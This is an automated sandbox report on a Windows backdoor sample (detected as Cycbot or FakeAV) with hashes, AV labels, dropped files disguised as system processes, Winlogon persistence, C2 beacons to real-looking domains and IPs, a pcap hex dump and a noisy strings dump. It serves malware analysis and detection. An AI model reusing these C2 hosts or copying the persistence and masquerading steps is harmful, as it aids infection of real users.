Analysis Date2015-01-12 12:32:52
MD5b5b4d95f5b75ea6f8ecaacf07ed3c1ea
SHA16f00a842477528fee82a3ba357d65dc9e9f553e9

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: de66dd56e0b8f8bbac717e748b9a5899 sha1: 3f4d792311425756fd6abb7f613ab8c3413c06ce size: 103424
Section.tls md5: de8a5a5ecb0c0803a6b6e62143053ffd sha1: 1e111b40de047fc65bfdddabdf9d3f6742276863 size: 1536
Section.data md5: f5fa46aae541afb83091067bb0c2925a sha1: 80ee711ea62ea3405e5441b14d6d4155af9380f2 size: 74240
Section.reloc md5: 0a1fd1adc3dda5be4ec808c7da076ad1 sha1: b2fb9c1b86b554551dc8818c4790b18df43581fd size: 1024
Timestamp2005-09-02 06:25:42
PEhashf148551deefed0f5269d56d6087cb323d8ad88aa
IMPhash65f160f364647c13264afaff36d3eb52
AV360 Safeno_virus
AVAd-AwareGen:Heur.Conjar.9
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.9
AVAuthentiumW32/Goolbot.J.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Heur.Conjar.9
AVCA (E-Trust Ino)Win32/FakeAlert.J!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-7001
AVDr. WebTrojan.DownLoader4.13967
AVEmsisoftGen:Heur.Conjar.9
AVEset (nod32)Win32/Kryptik.QSU
AVFortinetW32/Cycbot.AF!tr.dldr
AVFrisk (f-prot)W32/Goolbot.J.gen!Eldorado
AVF-SecureGen:Heur.Conjar.9
AVGrisoft (avg)Agent_r.ALA
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.k
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.9
AVRisingno_virus
AVSophosTroj/FakeAV-EFL
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS127.0.0.1
Winsock DNShappyratatuy.com
Winsock DNSmysmallhomespace.com
Winsock DNScrazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNScrazyleafdesign.com
Type: A
199.201.88.112
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSmysmallhomespace.com
Type: A
DNShappyratatuy.com
Type: A
HTTP GEThttp://crazyleafdesign.com/blog/images/share/facebook.png?v4=64&tq=gJ4WK%2FSUh%2FzMhRMw9YLJ8MSTUivqg4b8zZJEfqHXarVJ%2BQhhCA0%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 199.201.88.112:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f736861 72652f66 61636562 6f6f6b2e   /share/facebook.
0x00000020 (00032)   706e673f 76343d36 34267471 3d674a34   png?v4=64&tq=gJ4
0x00000030 (00048)   574b2532 46535568 2532467a 4d68524d   WK%2FSUh%2FzMhRM
0x00000040 (00064)   7739594c 4a384d53 54556976 71673462   w9YLJ8MSTUivqg4b
0x00000050 (00080)   387a5a4a 45667148 58617256 4a253242   8zZJEfqHXarVJ%2B
0x00000060 (00096)   51686843 41302533 44204854 54502f31   QhhCA0%3D HTTP/1
0x00000070 (00112)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000080 (00128)   636c6f73 650d0a48 6f73743a 20637261   close..Host: cra
0x00000090 (00144)   7a796c65 61666465 7369676e 2e636f6d   zyleafdesign.com
0x000000a0 (00160)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x000000b0 (00176)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x000000c0 (00192)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e786c 4b763937 35586c6d   X%2BSNxlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a                       ose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.
...
(
.
.
..
1h.{..0j.h
.
.M
080904b0
1.0.0.1
1915
FileVersion
&No Exit  Shift+N
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
&Yes
%~"/?/
$0hFMul
0h+gc0hIA>Hy
0h`hc2h
0hrh!/
0hrh71
?0hSbh
0hubh_a
*!0hYoV
(1.~;0I
.%&1eC[
1ieH:I
1*!OYi
1?\s	l
1W78i;
2|CL$k
_\{2di"J
*|:2hA
|2hfWph8
.2h\%J
}2h#)ph4?5
2hurh6
2hWbhd
2h,%w`h
2KR$[Y?)
3 hphWf
3>~J''`
3>NxvIc
!3.w3%s
%43JEk
4e%'|4o[hSBh
4K"UmFv
4-nqD!~
%4Q/>~IBh
4rhJkVs
'>.58(
]}5#`h
5wb!|!
5Wrhx8
5wV$UV
{+6KUO
6oShbh
;6qnk/
(6UO#G
7?0h9Y
&7GdZ($Y.
7J5{@h6
7M[\I*
7.Rich
7s*~I3
_85{!U
8d#7bZ
?8ddAQ^0h)
8F[ hfX
8?H2hU
8%J`hU
8/<JXU
99&Bh	}
9Nf%/	
{9\PhphIH
A0hJ?|;
a0hyVH
Aa0hkKc
AAA:}tF$
A,D&rhg
+Aff-a
A"h{2h
a|*H@O{
?"!aj3
aJzd'S
AlphaBlend
+^AOkx
auPhph
{AUrh9
B6>~HQ
bE8~8Y
bg,^td
Bh$2h h
~Bh?**Bh
+bh]&F
Bh hph
?=bh=J|bh7
BhK_vfg-
[bh!N+
bhQ-4(1
BhT=0hF
Bs521@q
B*T`s-
;bW\Gj
c2hN.dC
c6]>f7
c(~Ni]
CoCreateInstance
CoGetMalloc
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
^CPhF2h
c.Q`h@h
CreateFontIndirectA
cx&0hA
|cxAgT
d{2h2h h
@.data
d %d9V
DeleteCriticalSection
DeleteObject
%~|D=K
dP9 A0
.dPh2hm
drhy]}
dRPa+ia
DTR"36
du~|Q~q
	E1Y/r"}
e2h,-i
E~CzLk
efbhrh
=eg{ph
eM`hx'
EnterCriticalSection
EnumResourceTypesA
eok4;R
(EsdrLy4.
ezh2h$
!F~,@,[
F2=kwh`C
\f"%8z
F_@>BH
FBhph2h
:f,d32
Fe,FP*g@!]
F@j6\,
FreeEnvironmentStringsA
FreeEnvironmentStringsW
f>tlgZ
fymk1Rh
fzoph;
gBh2hv
GBh:h=X
GCbkaa*xF2o
GDI32.dll
GetACP
GetCPInfo
GetCPInfoExW
GetCurrentProcessId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastError
GetLocaleInfoA
GetOEMCP
GetStartupInfoA
GetStdHandle
GetTextExtentPointA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersionExA
G.`h~X
.g^@hxT
gJ/`h"hJc
G=Me^|
g+Rhg8
grPw<p
GU+7"he-:
-&Gv%ar{
g;>xGx
gyt!w,
GZ$5d.
`h]~|-
h0hwZU
h0hx@h
h2.dlU
<`h2h3\
h2h|{`h
h2h|V3
h3PhFAj"hBh
H}3QwG
@h4\Lj
h5,A5[
h5WlV5
h88SO- h
h8/>`h
`hbh$|
\`hbh1,!
hBh7duxph
`hBhO~@h*
"hbh('X0h
@h<%#c
| hCc}
!H	d0h
@hD>3<2hc
hE8. h
HeapSize
hEFV{~
h;#eW2h:yI
h']?F>
`h/FRh
h=G]?+
hG4N\?,
+hGDI3
hg:/d!m
hGdRh}'#}
h+grhe
"h{GRhS
@hG'XL
$@h%#^@h
h[`h'$
h[%@h8[
h@h9Bh
hhD?]D
@hhD<k
hHe	fG
`hh.["h
h`h"hg
h"h~%hN=Ph
 hH:KN
h`hM0h-Q
`h`hOi
h@ho>x
h h%s@h
~"h hX8
hi7h4Ox
`hI	Bh
@hikph*
hI(L,U
hJ.a.WTXRhG
h!j`h(/
h'=j`h
hJmLIF)
@hJQL!4Ys
hkf<hy
hL_gKY
hLqSJO4"h
hMmsPhv
hn4hg3
h%NzK"h
hOcxmPh
hOD90hVMbh
ho[*@h
hoZZ0h7
hph"hXphD
hphPhY
h	Phqph
`hPhrh
h	PhS4K=ph2hu
h~Phy	3	
"hrh[#
h'rh^;
hRh*aQ
hRhBh:
hs; hu
`hSttq
hTbh;`hQs0h
H}tQ\C3bk
hV855H
hvAeH=W
h,'v\H
hv*)s5
@hw]8Q
hWBhrh
hY0h#C
>hy,BN
h.Yki&
hYotns
hz@h0h
hz+lqY
i0hVd&U
i6}UOC0h
I93Ph2h
!IA#?SqXT{
IBhRhF
;IcbhHu
IFT|qd
InitializeCriticalSection
InterlockedExchange
InterlockedIncrement
iP]rOGgO
iSSw@*6
iuDhAy
i>vIx&0h
j`5e%G
j~c?#rh
jK?,-rh
Jm[f1@h
jVC2ht
k2hMx;^ h h
KERNEL32.dll
*kG h`h,T6/
K-HN2hu
K"hz1H
k]yIELc
Lbh?.H
lbhjW3
_l=&dC
LeaveCriticalSection
lLA6b\\
-lm4fS4
LoadLibraryW
_L	SILt
lstrlenW
LtkG,v
) lTL\cp
lTv+~g@hF[
>luEnk:
ma3ePh
MBhq3+2h
{mEYgV
m-?`h|
mkgH!#
mnMz]+p
MPhPh%
mrh|=q
MSIMG32.dll
M=T.E["
m'	u%2
MultiByteToWideChar
MV(~Z&O,
,@n 1u
N!2h=2h
n(AeVM
!n"hTV
{<n<IZ`
Nj7M}^
NjlEU';
n"kJ'k;9
nph.0h4{
"n|q,w7
o7]t`DE
oCuvQZ
O]F O5
O!"h@h4
O"hXY`h<OgQ
ole32.dll
ol.)TQ=A
Orh^49j
&O_$;u
!O{/wY
ox]d<,
OxwSTs h
PBc]B{
\ Ph?:
ph-0hy
Ph7GWBh
Ph7/Hphu h
ph'?8(
Ph.9ZnU
Ph\) h"hrh
]phL=h h
PhmrhO
~+|Ph;\n
phRhGn
ph	tDi-
PhW$0h
q	3MIYE7u1
q4Na<$]xA
~q E4t5
QES&2W
q_[imo
QInBhQ
qkqph|
qNYoe|0
=Q_phbh
QpW)^1
Q_QAPh
QrhuTQ
q	Tc?x6
QueryPerformanceCounter
QX{bh;a
RaiseException
rbIj|)
@RD8<{
.reloc
Re*O^d
re)Z	w
Rh#|3M
Rh3#$O
	RhDH,
Rh`hqBh&
]rh}i9
RhmX`h
rho2h[
-rhrh,.O[
!rhS)o
Rhs	vX
^RhyIhE0hq
~RL\ie
rZ=?/}
[S"00j
S0NLkiu
s10hxu!
s:=7Og
sbh0h6
&*sc>N
SelectObject
SetHandleCount
s@h7vs
;+S`hx
}so3O@h?N
SPh>Rh9
S:RD>~
SSxV9bPE
StringFromGUID2
T76GH?=t
!This program cannot be run in DOS mode.
)TjnM|
TlsGetValue
TlsSetValue
TML=Iv
TransparentBlt
U\4Lxf
UBh5jLL
U_IfvX
UnhandledExceptionFilter
Up@t\x
UqqeYc\
u%s$^f
UxuY;G
(V_0hRh
v2hSW{g
v*f-4u
"]~vkDv~
V.KOn!)
VmC>TIt
vNZUphBh
VS@hph
V&xbh@hQC\
{w0h5(
w2h[RhM2h
w59lT`
$w8<=#
w,aRhwz4
WGTW{5
w	|"hd^q*E
w%"hG2h
WideCharToMultiByte
wKX;)s
W>o>`_
WriteFile
~Wr(qt|
^WX+f	
X	?0h)
X0h`h2h
X9Phph
xD!keAf
x	#e2h4&
X|f|Q|
X`hJph3NSx
xNY%JzH
X)Rhj"h
{xRh.T
-xz+3t
Xz]Rhy
Y8v0ip
yS|2ho
--ysa`hJ
ysKQP$
`yT@WU"&&
z23,oqu
.:z!2V
Z3<oiu
z@i%}B
Z#->jV
Z@LQ&M>NJ
zPhbh>Obh
zsS5,W
z)t-mT
Z{v hHv
Z/}"+w
Zx7f.p@y=
ZZ4bh;Y
]z)Z}l